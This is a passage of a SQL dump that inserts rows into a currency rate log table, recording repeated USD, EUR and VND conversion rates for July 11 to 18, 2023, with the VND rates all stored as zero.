(6639, 2, 'EUR', 0.000000, 1, 'USD', 1.095600, '2023-07-11'),
(6640, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-11'),
(6641, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-11'),
(6642, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-11'),
(6643, 1, 'USD', 1.000000, 2, 'EUR', 0.912740, '2023-07-11'),
(6644, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-11'),
(6645, 2, 'EUR', 1.000000, 1, 'USD', 1.095600, '2023-07-11'),
(6646, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-11'),
(6647, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-11'),
(6648, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-11'),
(6649, 1, 'USD', 0.000000, 2, 'EUR', 0.912740, '2023-07-11'),
(6650, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-11'),
(6651, 2, 'EUR', 0.000000, 1, 'USD', 1.095600, '2023-07-11'),
(6652, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-11'),
(6653, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-11'),
(6654, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-11'),
(6655, 1, 'USD', 1.000000, 2, 'EUR', 0.912740, '2023-07-11'),
(6656, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-11'),
(6657, 2, 'EUR', 1.000000, 1, 'USD', 1.095600, '2023-07-11'),
(6658, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-11');
INSERT INTO `tblcurrency_rate_logs` (`id`, `from_currency_id`, `from_currency_name`, `from_currency_rate`, `to_currency_id`, `to_currency_name`, `to_currency_rate`, `date`) VALUES
(6659, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-11'),
(6660, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-11'),
(6661, 1, 'USD', 0.000000, 2, 'EUR', 0.912740, '2023-07-11'),
(6662, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-11'),
(6663, 2, 'EUR', 0.000000, 1, 'USD', 1.095600, '2023-07-11'),
(6664, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-11'),
(6665, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-11'),
(6666, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-11'),
(6667, 1, 'USD', 1.000000, 2, 'EUR', 0.912740, '2023-07-11'),
(6668, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-11'),
(6669, 2, 'EUR', 1.000000, 1, 'USD', 1.095600, '2023-07-11'),
(6670, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-11'),
(6671, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-11'),
(6672, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-11'),
(6673, 1, 'USD', 0.000000, 2, 'EUR', 0.912740, '2023-07-11'),
(6674, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-11'),
(6675, 2, 'EUR', 0.000000, 1, 'USD', 1.095600, '2023-07-11'),
(6676, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-11'),
(6677, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-11'),
(6678, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-11'),
(6679, 1, 'USD', 1.000000, 2, 'EUR', 0.912740, '2023-07-12'),
(6680, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-12'),
(6681, 2, 'EUR', 1.000000, 1, 'USD', 1.095600, '2023-07-12'),
(6682, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-12'),
(6683, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-12'),
(6684, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-12'),
(6685, 1, 'USD', 0.000000, 2, 'EUR', 0.910000, '2023-07-12'),
(6686, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-12'),
(6687, 2, 'EUR', 0.000000, 1, 'USD', 1.098900, '2023-07-12'),
(6688, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-12'),
(6689, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-12'),
(6690, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-12'),
(6691, 1, 'USD', 1.000000, 2, 'EUR', 0.910000, '2023-07-12'),
(6692, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-12'),
(6693, 2, 'EUR', 1.000000, 1, 'USD', 1.098900, '2023-07-12'),
(6694, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-12'),
(6695, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-12'),
(6696, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-12'),
(6697, 1, 'USD', 0.000000, 2, 'EUR', 0.910000, '2023-07-12'),
(6698, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-12'),
(6699, 2, 'EUR', 0.000000, 1, 'USD', 1.098900, '2023-07-12'),
(6700, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-12'),
(6701, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-12'),
(6702, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-12'),
(6703, 1, 'USD', 1.000000, 2, 'EUR', 0.910000, '2023-07-12'),
(6704, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-12'),
(6705, 2, 'EUR', 1.000000, 1, 'USD', 1.098900, '2023-07-12'),
(6706, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-12'),
(6707, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-12'),
(6708, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-12'),
(6709, 1, 'USD', 0.000000, 2, 'EUR', 0.910000, '2023-07-12'),
(6710, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-12'),
(6711, 2, 'EUR', 0.000000, 1, 'USD', 1.098900, '2023-07-12'),
(6712, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-12'),
(6713, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-12'),
(6714, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-12'),
(6715, 1, 'USD', 1.000000, 2, 'EUR', 0.910000, '2023-07-12'),
(6716, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-12'),
(6717, 2, 'EUR', 1.000000, 1, 'USD', 1.098900, '2023-07-12'),
(6718, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-12'),
(6719, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-12'),
(6720, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-12'),
(6721, 1, 'USD', 0.000000, 2, 'EUR', 0.910000, '2023-07-12'),
(6722, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-12'),
(6723, 2, 'EUR', 0.000000, 1, 'USD', 1.098900, '2023-07-12'),
(6724, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-12'),
(6725, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-12'),
(6726, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-12'),
(6727, 1, 'USD', 1.000000, 2, 'EUR', 0.910000, '2023-07-13'),
(6728, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-13'),
(6729, 2, 'EUR', 1.000000, 1, 'USD', 1.098900, '2023-07-13'),
(6730, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-13'),
(6731, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-13'),
(6732, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-13'),
(6733, 1, 'USD', 0.000000, 2, 'EUR', 0.907280, '2023-07-13'),
(6734, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-13'),
(6735, 2, 'EUR', 0.000000, 1, 'USD', 1.102200, '2023-07-13'),
(6736, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-13'),
(6737, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-13'),
(6738, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-13'),
(6739, 1, 'USD', 1.000000, 2, 'EUR', 0.907280, '2023-07-13'),
(6740, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-13'),
(6741, 2, 'EUR', 1.000000, 1, 'USD', 1.102200, '2023-07-13'),
(6742, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-13'),
(6743, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-13'),
(6744, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-13'),
(6745, 1, 'USD', 0.000000, 2, 'EUR', 0.907280, '2023-07-13'),
(6746, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-13'),
(6747, 2, 'EUR', 0.000000, 1, 'USD', 1.102200, '2023-07-13'),
(6748, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-13'),
(6749, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-13'),
(6750, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-13'),
(6751, 1, 'USD', 1.000000, 2, 'EUR', 0.907280, '2023-07-13'),
(6752, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-13'),
(6753, 2, 'EUR', 1.000000, 1, 'USD', 1.102200, '2023-07-13'),
(6754, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-13'),
(6755, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-13'),
(6756, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-13'),
(6757, 1, 'USD', 0.000000, 2, 'EUR', 0.907280, '2023-07-13'),
(6758, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-13'),
(6759, 2, 'EUR', 0.000000, 1, 'USD', 1.102200, '2023-07-13'),
(6760, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-13'),
(6761, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-13'),
(6762, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-13'),
(6763, 1, 'USD', 1.000000, 2, 'EUR', 0.907280, '2023-07-13'),
(6764, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-13'),
(6765, 2, 'EUR', 1.000000, 1, 'USD', 1.102200, '2023-07-13'),
(6766, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-13'),
(6767, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-13'),
(6768, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-13'),
(6769, 1, 'USD', 0.000000, 2, 'EUR', 0.907280, '2023-07-13'),
(6770, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-13'),
(6771, 2, 'EUR', 0.000000, 1, 'USD', 1.102200, '2023-07-13'),
(6772, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-13'),
(6773, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-13'),
(6774, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-13'),
(6775, 1, 'USD', 1.000000, 2, 'EUR', 0.907280, '2023-07-14'),
(6776, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-14'),
(6777, 2, 'EUR', 1.000000, 1, 'USD', 1.102200, '2023-07-14'),
(6778, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-14'),
(6779, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-14'),
(6780, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-14'),
(6781, 1, 'USD', 0.000000, 2, 'EUR', 0.894290, '2023-07-14'),
(6782, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-14'),
(6783, 2, 'EUR', 0.000000, 1, 'USD', 1.118200, '2023-07-14'),
(6784, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-14'),
(6785, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-14'),
(6786, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-14'),
(6787, 1, 'USD', 1.000000, 2, 'EUR', 0.894290, '2023-07-14'),
(6788, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-14'),
(6789, 2, 'EUR', 1.000000, 1, 'USD', 1.118200, '2023-07-14'),
(6790, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-14'),
(6791, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-14'),
(6792, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-14'),
(6793, 1, 'USD', 0.000000, 2, 'EUR', 0.894290, '2023-07-14'),
(6794, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-14'),
(6795, 2, 'EUR', 0.000000, 1, 'USD', 1.118200, '2023-07-14'),
(6796, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-14'),
(6797, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-14'),
(6798, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-14'),
(6799, 1, 'USD', 1.000000, 2, 'EUR', 0.894290, '2023-07-14'),
(6800, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-14'),
(6801, 2, 'EUR', 1.000000, 1, 'USD', 1.118200, '2023-07-14'),
(6802, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-14'),
(6803, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-14'),
(6804, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-14'),
(6805, 1, 'USD', 0.000000, 2, 'EUR', 0.894290, '2023-07-14'),
(6806, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-14'),
(6807, 2, 'EUR', 0.000000, 1, 'USD', 1.118200, '2023-07-14'),
(6808, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-14'),
(6809, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-14'),
(6810, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-14'),
(6811, 1, 'USD', 1.000000, 2, 'EUR', 0.894290, '2023-07-14'),
(6812, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-14'),
(6813, 2, 'EUR', 1.000000, 1, 'USD', 1.118200, '2023-07-14'),
(6814, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-14'),
(6815, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-14'),
(6816, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-14'),
(6817, 1, 'USD', 0.000000, 2, 'EUR', 0.894290, '2023-07-14'),
(6818, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-14'),
(6819, 2, 'EUR', 0.000000, 1, 'USD', 1.118200, '2023-07-14'),
(6820, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-14'),
(6821, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-14'),
(6822, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-14'),
(6823, 1, 'USD', 1.000000, 2, 'EUR', 0.894290, '2023-07-15'),
(6824, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-15'),
(6825, 2, 'EUR', 1.000000, 1, 'USD', 1.118200, '2023-07-15'),
(6826, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-15'),
(6827, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-15'),
(6828, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-15'),
(6829, 1, 'USD', 0.000000, 2, 'EUR', 0.891190, '2023-07-15'),
(6830, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-15'),
(6831, 2, 'EUR', 0.000000, 1, 'USD', 1.122100, '2023-07-15'),
(6832, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-15'),
(6833, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-15'),
(6834, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-15'),
(6835, 1, 'USD', 1.000000, 2, 'EUR', 0.891190, '2023-07-15'),
(6836, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-15'),
(6837, 2, 'EUR', 1.000000, 1, 'USD', 1.122100, '2023-07-15'),
(6838, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-15'),
(6839, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-15'),
(6840, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-15'),
(6841, 1, 'USD', 0.000000, 2, 'EUR', 0.891190, '2023-07-15'),
(6842, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-15'),
(6843, 2, 'EUR', 0.000000, 1, 'USD', 1.122100, '2023-07-15'),
(6844, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-15'),
(6845, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-15'),
(6846, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-15'),
(6847, 1, 'USD', 1.000000, 2, 'EUR', 0.891190, '2023-07-15'),
(6848, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-15'),
(6849, 2, 'EUR', 1.000000, 1, 'USD', 1.122100, '2023-07-15'),
(6850, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-15'),
(6851, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-15'),
(6852, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-15'),
(6853, 1, 'USD', 0.000000, 2, 'EUR', 0.891190, '2023-07-15'),
(6854, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-15'),
(6855, 2, 'EUR', 0.000000, 1, 'USD', 1.122100, '2023-07-15'),
(6856, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-15'),
(6857, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-15'),
(6858, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-15'),
(6859, 1, 'USD', 1.000000, 2, 'EUR', 0.891190, '2023-07-15'),
(6860, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-15'),
(6861, 2, 'EUR', 1.000000, 1, 'USD', 1.122100, '2023-07-15'),
(6862, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-15'),
(6863, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-15'),
(6864, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-15'),
(6865, 1, 'USD', 0.000000, 2, 'EUR', 0.891190, '2023-07-15'),
(6866, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-15'),
(6867, 2, 'EUR', 0.000000, 1, 'USD', 1.122100, '2023-07-15'),
(6868, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-15'),
(6869, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-15'),
(6870, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-15'),
(6871, 1, 'USD', 1.000000, 2, 'EUR', 0.891190, '2023-07-16'),
(6872, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-16'),
(6873, 2, 'EUR', 1.000000, 1, 'USD', 1.122100, '2023-07-16'),
(6874, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-16'),
(6875, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-16'),
(6876, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-16'),
(6877, 1, 'USD', 0.000000, 2, 'EUR', 0.891190, '2023-07-16'),
(6878, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-16'),
(6879, 2, 'EUR', 0.000000, 1, 'USD', 1.122100, '2023-07-16'),
(6880, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-16'),
(6881, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-16'),
(6882, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-16'),
(6883, 1, 'USD', 1.000000, 2, 'EUR', 0.891190, '2023-07-16'),
(6884, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-16'),
(6885, 2, 'EUR', 1.000000, 1, 'USD', 1.122100, '2023-07-16'),
(6886, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-16'),
(6887, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-16'),
(6888, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-16'),
(6889, 1, 'USD', 0.000000, 2, 'EUR', 0.891190, '2023-07-16'),
(6890, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-16'),
(6891, 2, 'EUR', 0.000000, 1, 'USD', 1.122100, '2023-07-16'),
(6892, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-16'),
(6893, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-16'),
(6894, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-16'),
(6895, 1, 'USD', 1.000000, 2, 'EUR', 0.891190, '2023-07-16'),
(6896, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-16'),
(6897, 2, 'EUR', 1.000000, 1, 'USD', 1.122100, '2023-07-16'),
(6898, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-16'),
(6899, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-16'),
(6900, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-16'),
(6901, 1, 'USD', 0.000000, 2, 'EUR', 0.891190, '2023-07-16'),
(6902, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-16'),
(6903, 2, 'EUR', 0.000000, 1, 'USD', 1.122100, '2023-07-16'),
(6904, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-16'),
(6905, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-16'),
(6906, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-16'),
(6907, 1, 'USD', 1.000000, 2, 'EUR', 0.891190, '2023-07-16'),
(6908, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-16'),
(6909, 2, 'EUR', 1.000000, 1, 'USD', 1.122100, '2023-07-16'),
(6910, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-16'),
(6911, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-16'),
(6912, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-16'),
(6913, 1, 'USD', 0.000000, 2, 'EUR', 0.891190, '2023-07-16'),
(6914, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-16'),
(6915, 2, 'EUR', 0.000000, 1, 'USD', 1.122100, '2023-07-16'),
(6916, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-16'),
(6917, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-16'),
(6918, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-16'),
(6919, 1, 'USD', 1.000000, 2, 'EUR', 0.891190, '2023-07-17'),
(6920, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-17'),
(6921, 2, 'EUR', 1.000000, 1, 'USD', 1.122100, '2023-07-17'),
(6922, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-17'),
(6923, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-17'),
(6924, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-17'),
(6925, 1, 'USD', 0.000000, 2, 'EUR', 0.891190, '2023-07-17'),
(6926, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-17'),
(6927, 2, 'EUR', 0.000000, 1, 'USD', 1.122100, '2023-07-17'),
(6928, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-17'),
(6929, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-17'),
(6930, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-17'),
(6931, 1, 'USD', 1.000000, 2, 'EUR', 0.891190, '2023-07-17'),
(6932, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-17'),
(6933, 2, 'EUR', 1.000000, 1, 'USD', 1.122100, '2023-07-17'),
(6934, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-17'),
(6935, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-17'),
(6936, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-17'),
(6937, 1, 'USD', 0.000000, 2, 'EUR', 0.891190, '2023-07-17'),
(6938, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-17'),
(6939, 2, 'EUR', 0.000000, 1, 'USD', 1.122100, '2023-07-17'),
(6940, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-17'),
(6941, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-17'),
(6942, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-17'),
(6943, 1, 'USD', 1.000000, 2, 'EUR', 0.891190, '2023-07-17'),
(6944, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-17'),
(6945, 2, 'EUR', 1.000000, 1, 'USD', 1.122100, '2023-07-17'),
(6946, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-17'),
(6947, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-17'),
(6948, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-17'),
(6949, 1, 'USD', 0.000000, 2, 'EUR', 0.891190, '2023-07-17'),
(6950, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-17'),
(6951, 2, 'EUR', 0.000000, 1, 'USD', 1.122100, '2023-07-17'),
(6952, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-17'),
(6953, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-17'),
(6954, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-17'),
(6955, 1, 'USD', 1.000000, 2, 'EUR', 0.891190, '2023-07-17'),
(6956, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-17'),
(6957, 2, 'EUR', 1.000000, 1, 'USD', 1.122100, '2023-07-17'),
(6958, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-17'),
(6959, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-17'),
(6960, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-17'),
(6961, 1, 'USD', 0.000000, 2, 'EUR', 0.891190, '2023-07-17'),
(6962, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-17'),
(6963, 2, 'EUR', 0.000000, 1, 'USD', 1.122100, '2023-07-17'),
(6964, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-17'),
(6965, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-17'),
(6966, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-17'),
(6967, 1, 'USD', 1.000000, 2, 'EUR', 0.891190, '2023-07-18'),
(6968, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-18'),
(6969, 2, 'EUR', 1.000000, 1, 'USD', 1.122100, '2023-07-18'),
(6970, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-18'),
(6971, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-18'),
(6972, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-18'),
(6973, 1, 'USD', 0.000000, 2, 'EUR', 0.890470, '2023-07-18'),
(6974, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-18'),
(6975, 2, 'EUR', 0.000000, 1, 'USD', 1.123000, '2023-07-18'),
(6976, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-18'),
(6977, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-18'),
(6978, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-18'),
(6979, 1, 'USD', 1.000000, 2, 'EUR', 0.890470, '2023-07-18'),
(6980, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-18'),
(6981, 2, 'EUR', 1.000000, 1, 'USD', 1.123000, '2023-07-18'),
(6982, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-18'),
(6983, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-18'),
(6984, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-18'),
(6985, 1, 'USD', 0.000000, 2, 'EUR', 0.890470, '2023-07-18'),
(6986, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-18'),
(6987, 2, 'EUR', 0.000000, 1, 'USD', 1.123000, '2023-07-18'),
